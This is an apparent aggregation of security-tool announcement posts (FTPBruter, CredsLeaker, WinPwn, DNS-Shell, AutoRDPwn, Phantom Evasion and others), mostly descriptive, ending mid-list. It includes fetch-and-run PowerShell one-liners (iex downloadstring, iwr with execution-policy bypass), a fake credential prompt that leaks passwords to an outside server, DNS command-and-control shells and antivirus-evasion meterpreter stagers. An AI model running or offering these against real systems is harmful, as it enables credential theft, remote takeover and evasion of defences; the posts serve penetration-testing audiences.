FTPBruter – A FTP Server Brute Forcing Tool

Brute forcing tool for FTP server. FTPBruter can work in any OS if they have and support Python 3.FeatureBrute force a FTP server with a username or a list of usernames (That’s all).Install and Run on LinuxYou have to install Python 3 first:Install Python 3 on Arch Linux and its distros: sudo pacman -S python3 Install Python 3 on Debian and its distros: sudo apt install python3 git clone https://github.com/GitHackTools/FTPBrutercd FTPBruterpython3 ftpbruter.pyInstall and Run on WindowsDownload and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.Download and run Git setup file from Git-scm.com and choose Use Git from Windows Command Propmt.After that, open PowerShell or Command Propmt and enter these commands:git clone https://github.com/GitHackTools/FTPBrutercd FTPBruterpython3 ftpbruter.pyIf you don’t want to install Git, you can download FTPBruter-master.zip, extract and use it.ScreenshotsContact to coderWebsite: GitHackTools.blogspot.comTwitter: @SecureGFTo-do listsCheck anonymous login.Auto-change proxy with brute force.Download FTPBruter

Link: http://feedproxy.google.com/~r/PentestTools/~3/hudxodR8GrU/ftpbruter-ftp-server-brute-forcing-tool.html

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW, it is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications it is primarily a research tool in it’s current state.For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd party infrastructure such as Elasticsearch.Implementation DetailsLibrariesSilkETW is buit on .Net v4.5 and uses a number of 3rd party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.ModuleId Version LicenseUrl ——– ——- ———- McMaster.Extensions.CommandLineUtils 2.3.2 https://licenses.nuget.org/Apache-2.0 Microsoft.Diagnostics.Tracing.TraceEvent 2.0.36 https://github.com/Microsoft/perfview/blob/master/LICENSE.TXTNewtonsoft.Json 12.0.1 https://licenses.nuget.org/MIT System.ValueTuple 4.4.0 https://github.com/dotnet/corefx/blob/master/LICENSE.TXT YaraSharp 1.3.1 https://github.com/stellarbear/YaraSharp/blob/master/LICENSECommand Line OptionsCommand line usage is fairly straight forward and user input is validated in the execution prologue. See the image below for further details.JSON Output StructureThe JSON output, prior to serialization, is formatted according to the following C# struct.public struct EventRecordStruct{ public Guid ProviderGuid; public List YaraMatch; public string ProviderName; public string EventName; public TraceEventOpcode Opcode; public string OpcodeName; public DateTime TimeStamp; public int ThreadID; public int ProcessID; public string ProcessName; public int PointerSize; public int EventDataLength; public Hashtable XmlEventData;}Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table. Sample JSON output can be seen below for “Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".{ "ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716", "YaraMatch":[ ], "ProviderName":"Microsoft-Windows-Kernel-Process", "EventName":"ThreadStop/Stop", "Opcode":2, "OpcodeName":"Stop", "TimeStamp":"2019-03-03T17:58:14.2862348+00:00", "ThreadID":11996, "ProcessID":8416, "ProcessName":"", "PointerSize":8, "EventDataLength":76, "XmlEventData":{ "FormattedMessage":"Thread 11,996 (in Process 8,416) stopped. ", "StartAddr":"0x7fffe299a110", "ThreadID":"11,996", "UserStackLimit":"0x3d632000", "StackLimit":"0xfffff38632d39000", "MSec":"560.5709", "TebBase":"0x91c000", "CycleTime":"4,266,270", "ProcessID":"8,416", "PID":"8416", "StackBase":"0xfffff38632d40000", "SubProcessTag":"0", "TID":"11996", "ProviderName":"Microsoft-Windows-Kern el-Process", "PName":"", "UserStackBase":"0x3d640000", "EventName":"ThreadStop/Stop", "Win32StartAddr":"0x7fffe299a110" }}UsageFilter data in PowerShellYou can import JSON output from SilkETW in PowerShell using the following simple function.function Get-SilkData { param($Path) $JSONObject = @() Get-Content $Path | ForEach-Object { $JSONObject += $_ | ConvertFrom-Json } $JSONObject}In the example below we will collect process event data from the Kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.jsonWith data in hand it is easy to sort, grep and filter for the properties we are interested in.YaraSilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike’s execute-assembly.rule Seatbelt_GetTokenInformation{ strings: $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/ $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase condition: all of ($s*)}We can start collecting .Net ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.jsonWe can see at runtime that our Yara rule was hit.Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.ChangelogFor details on version specific changes, please refer to the Changelog.Download SilkETW

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

CredsLeaker v3 – Tool to Display A Powershell Credentials Box

This script used to display a powershell credentials box asked the user for credentials.However, That was highly noticeable. Now it’s time to utilize Windows Security popup!As before, The box cannot be closed (only by killing the process) will keeps checking the credentials against the DC. When validated, it will close and leak it to a web server outside.How To:Start a web server.Type your server IP and port in the ps1 script.Execute the batch file.LegalThis software is provided for educational use only (also with redteamers in mind). Don’t use credsleaker without mutual consent. If you engage in any illegal activity the author does not take any responsibility for it. By using this software you agree with these terms.Download CredsLeaker

Link: http://feedproxy.google.com/~r/PentestTools/~3/9y08bFtnHNg/credsleaker-v3-tool-to-display.html

PowerShellArsenal – A PowerShell Module Dedicated To Reverse Engineering

PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code, perform .NET malware analysis, analyze/scrape memory, parse file formats and memory structures, obtain internal system information, etc. PowerShellArsenal is comprised of the following tools:DisassemblyDisassemble native and managed code.Get-CSDisassemblyDisassembles a byte array using the Capstone Engine disassembly framework.Get-ILDisassemblyDisassembles a raw MSIL byte array passed in from a MethodInfo object in a manner similar to that of Ildasm.MalwareAnalysisUseful tools when performing malware analysis.New-FunctionDelegateProvides an executable wrapper for an X86 or X86_64 function.Invoke-LoadLibraryLoads a DLL into the current PowerShell process.New-DllExportFunctionCreates an executable wrapper delegate around an unmanaged, exported function.Get-HostsFileParses a HOSTS file.New-HostsFileEntryReplace or append an entry to a HOSTS file.Remove-HostsFileEntryRemove an entry or series of entries from a HOSTS file.Get-AssemblyStringsOutput all strings from a .NET executable.Get-AssemblyResourcesExtract managed resources from a .NET assemblyRemove-AssemblySuppressIldasmAttributeStrips a SuppressIldasmAttribute attribute from a .NET assembly.Get-AssemblyImplementedMethodsReturns all methods in an assembly that are implemented in MSIL.MemoryToolsInspect and analyze process memoryGet-ProcessStringsOutputs all printable strings from the user-mode memory of a process.Get-VirtualMemoryInfoA wrapper for kernel32!VirtualQueryExGet-ProcessMemoryInfoRetrieve virtual memory information for every unique set of pages in user memory. This function is similar to the !vadump WinDbg command.Get-StructFromMemoryMarshals data from an unmanaged block of memory in an arbitrary process to a newly allocated managed object of the specified type.ParsersParse file formats and in-memory structures.Get-PEAn on-disk and in-memory PE parser and process dumper.Find-ProcessPEsFinds portable executables in memory regardless of whether or not they were loaded in a legitimate fashion.Get-LibSymbolsDisplays symbolic information from Windows LIB files.Get-ObjDumpDisplays information about Windows object (OBJ) files.WindowsInternalsObtain and analyze low-level Windows OS information.Get-NtSystemInformationA utility that calls and parses the output of the ntdll!NtQuerySystemInformation function. This utility can be used to query internal OS information that is typically not made visible to a user.Get-PEBReturns the process environment block (PEB) of a process.Register-ProcessModuleTraceStarts a trace of loaded process modulesGet-ProcessModuleTraceDisplays the process modules that have been loaded since the call to Register-ProcessModuleTraceUnregister-ProcessModuleTraceStops the running process module traceGet-SystemInfoA wrapper for kernel32!GetSystemInfoMiscMiscellaneous helper functionsGet-MemberA proxy function used to extend the built-in Get-Member cmdlet. It adds the ‘-Private’ parameter allowing you to display non-public .NET membersGet-StringsDumps strings from files in both Unicode and Ascii. This cmdlet replicates the functionality of strings.exe from Sysinternals.ConvertTo-StringConverts the bytes of a file to a string that has a 1-to-1 mapping back to the file’s original bytes. ConvertTo-String is useful for performing binary regular expressions.Get-EntropyCalculates the entropy of a file or byte array.LibLibraries required by some of the RE functions.CapstoneThe Capstone disassembly engine C# binding.De4dotA powerful .NET deobfuscation and .NET PE parsing library.PSReflectA module used to easily define in-memory enums, structs, and Win32 functions.Formattersps1xml files used to format the output of various PowerShellArsenal functions.LicenseThe PowerShellArsenal module and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.UsageRefer to the comment-based help in each individual script for detailed usage information.To install this module, drop the entire PowerShellArsenal folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.The default per-user module path is: “$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"To use the module, type Import-Module PowerShellArsenalTo see the commands imported, type Get-Command -Module PowerShellArsenalIf you’re running PowerShell v3 and you want to remove the annoying ‘Do you really want to run scripts downloaded from the Internet’ warning, once you’ve placed PowerShellArsenal into your module path, run the following one-liner: $Env:PSModulePath.Split(‘;’) | % { if ( Test-Path (Join-Path $_ PowerShellArsenal) ) {Get-ChildItem $_ -Recurse | Unblock-File} }For help on each individual command, Get-Help is your friend.Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.Script Style GuideFor all contributors and future contributors to PowerShellArsenal, I ask that you follow this style guide when writing your scripts/modules.Avoid Write-Host at all costs. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles: http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspxhttp://technet.microsoft.com/en-us/library/ff730946.aspxIf you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on ‘-Verbose’. Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license). Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis. I prefer that variable names be capitalized and be as descriptive as possible. Provide logical spacing in between your code. Indent your code to make it more readable. If you find yourself repeating code, write a function. Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use ‘Throw’. If you have an error that doesn’t need to stop execution, use Write-Error. If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible. Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to. PowerShell v2 compatibility is highly desired. Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I’m looking for something like the following: [Parameter(Position = 0, Mandatory = $True)]Don’t use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias. Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break. Don’t go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader. Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement. Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters. Explicitly state all required and optional dependencies in the comment-based help for your function. All library dependencies should reside in the ‘Lib’ folder. If a script creates complex custom objects, include a ps1xml file that will properly format the object’s output. ps1xml files are stored in Lib\Formatters. Download PowerShellArsenal

Link: http://www.kitploit.com/2019/04/powershellarsenal-powershell-module.html

Commando VM – The First of Its Kind Windows Offensive Distribution

Welcome to CommandoVM – a fully customized, Windows-based security distribution for penetration testing and red teaming.Installation (Install Script)RequirementsWindows 7 Service Pack 1 or Windows 1060 GB Hard Drive2 GB RAMInstructionsCreate and configure a new Windows Virtual MachineEnsure VM is updated completely. You may have to check for updates, reboot, and check again until no more remainTake a snapshot of your machine!Download and copy install.ps1 on your newly configured machine.Open PowerShell as an AdministratorEnable script execution by running the following command:Set-ExecutionPolicy UnrestrictedFinally, execute the installer script as follows:.\install.ps1You can also pass your password as an argument: .\install.ps1 -password The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.Installing a new packageCommando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:cinst githubStaying up to dateType the following command to update all of the packages to the most recent version:cup allInstalled ToolsActive Directory ToolsRemote Server Administration Tools (RSAT)SQL Server Command Line UtilitiesSysinternalsCommand & ControlCovenantPoshC2WMImplantWMIOpsDeveloper ToolsDepGitGoJavaPython 2Python 3 (default)Visual Studio 2017 Build Tools (Windows 10)Visual Studio CodeEvasionCheckPleaseDemiguiseDotNetToJScriptInvoke-CradleCrafterInvoke-DOSfuscationInvoke-ObfuscationInvoke-Phant0mNot PowerShell (nps)PS>AttackPSAmsiPafishmacroPowerLessShellPowerShdllStarFightersExploitationADAPE-ScriptAPI MonitorCrackMapExecCrackMapExecWinDAMPExchange-AD-PrivescFuzzySec’s PowerShell-SuiteFuzzySec’s Sharp-SuiteGenerate-MacroGhostPackRubeusSafetyKatzSeatbeltSharpDPAPISharpDumpSharpRoastSharpUpSharpWMIGoFetchImpacketInvoke-ACLPwnInvoke-DCOMInvoke-PSImageInvoke-PowerThIEfKali Binaries for WindowsLuckyStrikeMetaTwinMetasploitMr. Unikod3r’s RedTeamPowershellScriptsNetshHelperBeaconNishangOrcaPSReflectPowerLurkPowerPrivPowerSploitPowerUpSQLPrivExchangeRulerSharpExchangePrivSpoolSampleUACMEimpacket-examples-windowsvssownInformation GatheringADACLScannerADExplorerADOfflineADReconBloodHoundGet-ReconInfoGoWitnessNmapPowerViewDev branch includedSharpHoundSharpViewSpoolerScannerNetworking ToolsCitrix ReceiverOpenVPNProxycapPuTTYTelnetVMWare Horizon ClientVMWare vSphere ClientVNC-ViewerWinSCPWindumpWiresharkPassword AttacksASREPRoastCredNinjaDSInternalsGet-LAPSPasswordsHashcatInternal-MonologueInveighInvoke-TheHashKeeFarceKeeThiefLAPSToolkitMailSniperMimikatzMimikittenzRiskySPNSessionGopherReverse EngineeringDNSpyFlare-FlossILSpyPEviewWindbgx64dbgUtilities7zipAdobe ReaderAutoITCmderCyberChefGimpGreenshotHashcheckHexchatHxDKeepassMobaXtermMozilla ThunderbirdNeo4j Community EditionPidginProcess Hacker 2SQLite DB BrowserScreentogifShellcode LauncherSublime Text 3TortoiseSVNVLC Media PlayerWinraryEd Graph ToolVulnerability AnalysisEgress-AssessGrouper2zBangWeb ApplicationsBurp SuiteFiddlerFirefoxOWASP ZapWordlistsFuzzDBPayloadsAllTheThingsSecListsDownload Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.Different local recon modules, domain recon modules, pivilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!Just Import the Modules with “Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1’)Functions available after Import: WinPwn -> Guides the user through all functions/Modules with simple questions. Inveigh -> Executes Inveigh in a new Console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with Session management afterwards sessionGopher -> Executes Sessiongopher and Asking for parameters (https://github.com/Arvanaghi/SessionGopher) Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit) localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS) JAWS -> Just another Windows Privilege Escalation script gets executed domainreconmodules -> Different Powerview situal awareness functions get executed and the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray) Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump) lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne) latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be used here. empirelauncher -> Launch powershell empire oneliner on remote Systems (https://github.com/EmpireProject/Empire) shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit) groupsearch -> Get-DomainGPOUserLocalGroupMapping – find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking isadmin -> Checks for local admin access on the local system Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record and run Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard) The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (https://github.com/jaredhaight/PSAttack).Todo:Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.Proxy Options via PAC-File are not correctly found in the moment.Legal disclaimer:Usage of WinPwn for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.Download WinPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

LAPSToolkit – Tool To Audit And Attack LAPS Environments

Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft’s Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins, finding users with “All Extended Rights" that can view passwords, and viewing all computers with LAPS enabled.Please submit issues or comments for any problems or performance improvements. This project was created with code from an older version of PowerView.For more information on how LAPS works see https://adsecurity.org/?p=1790.Get-LAPSComputers:Displays all computers with LAPS enabled, password expriation, and password if user has accessFind-LAPSDelegatedGroups:Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attributeFind-AdmPwdExtendedRightsParses through ExtendedRights for each AD computer with LAPS enabled and looks for which group has read access and if any user has "All Extended Rights". Sysadmins may not be aware the users with All Extended Rights can view passwords and may be less protected than the users in the delegated groups. An example is the user which adds a computer to the domain automatically receives the "All Extended Rights" permission. Since this function will parse ACLs for each AD computer, this can take very long with a larger domain.Special thanks to Sean Metcalf (@pyrotek3), Will Schroeder (@harmj0y), Karl Fosaaen (@kfosaaen), Matt Graeber (@mattifestation) for research and code with LAPS, AD permissions, and offensive PowerShell.Download LAPSToolkit

Link: http://feedproxy.google.com/~r/PentestTools/~3/0JNW5bf6UGc/lapstoolkit-tool-to-audit-and-attack.html

DNS-Shell – An Interactive Shell Over DNS Channel

DNS-Shell is an interactive Shell over DNS channel. The server is Python based and can run on any operating system that has python installed, the payload is an encoded PowerShell command.Understanding DNS-ShellThe Payload is generated when the sever script is invoked and it simply utilizes nslookup to perform the queries and query the server for new commands the server then listens on port 53 for incoming communications, once payload is executed on the target machine the server will spawn an interactive shell.Once the channel is established the payload will continously query the server for commands if a new command is entered, it will execute it and return the result back to the server.Using DNS-ShellRunning DNS-Shell is relatively simpleDNS-Shell supports two mode of operations direct and recursive modes:Perform a git clone from our DNS-shell Github pageDNS-Shell direct mode: sudo python DNS-Shell.py -l -d [Server IP]DNS-Shell recursive mode: sudo python DNS-Shell.py -l -r [Domain]Download DNS-Shell

Link: http://www.kitploit.com/2019/03/dns-shell-interactive-shell-over-dns.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

Phantom Evasion – Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.The following OSs officialy support automatic setup:Kali Linux Rolling 2018.1+ (64 bit)Parrot Security (64 bit)The following OSs are likely able to run Phantom Evasion through manual setup:Arch Linux (64 bit)BlackArch Linux (64 bit)Elementary (64 bit)Linux Mint (64 bit)Ubuntu 15.10+ (64 bit)Windows 7/8/10 (64 bit)ContributorsSpecial thanks to:phra https://github.com/phrastefano118 https://github.com/stefano118Getting StartedSimply git clone or download and unzip Phantom-Evasion folderKali Linux:Automatic setup officially supported, open a terminal and execute phantom-evasion:sudo python phantom-evasion.py or:sudo chmod +x ./phantom-evasion.pysudo ./phantom-evasion.pyDependencies (only for manual setup)metasploit-frameworkmingw-w64 (cygwin on windows)gccapktoolstripwine (not necessary on windows)apksignerpyinstallerrequire libc6-dev-i386 (linux only)WINDOWS PAYLOADSWindows Shellcode Injection Modules (C)Msfvenom windows payloads and custom shellcodes supported(>) Randomized junkcode and windows antivirus evasion techniques(>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section)(>) Decoy Processes Spawner available (see Decoy Process Spawner section)(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))(>) Execution time range:35-60 secondWindows Shellcode Injection VirtualAlloc: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection VirtualAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using HeapAlloc,HeapCreate,CreateThread,WaitForSingleObject API. Windows Shellcode Injection HeapAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection HeapAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection Process inject: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Windows Shellcode Injection Process inject NoDirectCall LL/GPA: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection Process inject NoDirectCall GPA/GMH: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection Thread Hijack: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Windows Shellcode Injection Thread Hijack LL/GPA: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection Thread Hijack GPA/GMH: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Pure C meterpreter stagerPure C polymorphic meterpreter stagers compatible with msfconsole and cobalt strike beacon.(reverse_tcp/reverse_http)(>) Randomized junkcode and windows antivirus evasion techniques (>) Phantom evasion decoy process spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 secondC meterpreter/reverse_TCP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual) C meterpreter/reverse_TCP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap) C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (rrequire multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual , API loaded at runtime) C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap , API loaded at runtime) C meterpreter/reverse_HTTP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Virtual) C meterpreter/reverse_HTTP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap) C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , API loaded at runtime) C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap 